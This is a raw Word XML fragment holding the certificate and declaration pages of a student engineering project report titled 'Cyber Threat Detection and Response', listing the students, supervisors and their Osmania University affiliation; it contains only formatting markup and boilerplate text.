          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>CYBER THREAT DETECTION AND RESPONSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>is being submitted by the following students:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="-333"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
          <w:tab w:val="left" w:pos="5760"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>bdul Samad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:tab/>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1610217490</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
          <w:tab w:val="left" w:pos="5760"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720"/>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Mohammed Abdul Raqeeb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                                  </w:t>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 xml:space="preserve"> 1610217490</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>35</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
          <w:tab w:val="left" w:pos="5760"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720"/>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 xml:space="preserve">Mohammed FasiUddin Arsalaan                            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>1610217490</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>41</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="left" w:pos="1440"/>
          <w:tab w:val="left" w:pos="5760"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="720"/>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auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">They have presented the project work during the academic year 2023–2024 in partial fulfillment of the requirements for the award of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>BACHELOR OF ENGINEERING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">DEPARTMENT OF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>CSE (IOT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>,CS,BCT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Osmania University.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  This is a bonafide record work carried out by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> them under our guidance and supervision.  The results of investigation enclosed with this report have been verified and found to be satisfactory. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Internal Supervisor           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Project Coordinator &amp; Head of the Dept. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="3600" w:firstLine="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>External Examiner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>DECLARATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="720" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="66" w:rightChars="0" w:firstLine="360"/>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auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We hereby declare that the project work entitled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>CYBER THREAT DETECTION AND RESPONSE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> submitted to the Department of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Computer Science and Engineering of NAWAB SHAH ALAM KHAN COLLEGE OF ENGINEERING AND TECHNOLOGY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, affiliated to Osmania University, Hyderabad in the partial fulfillment of the requirement for award of the degree in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>BACHELOR OF ENGINEERING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>CSE (IOT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>,CS,BCT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> bonafide work done by the undersigned.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="-333"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="-333"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="-333"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="-333"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="-333"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="-333" w:firstLine="280" w:firstLineChars="100"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
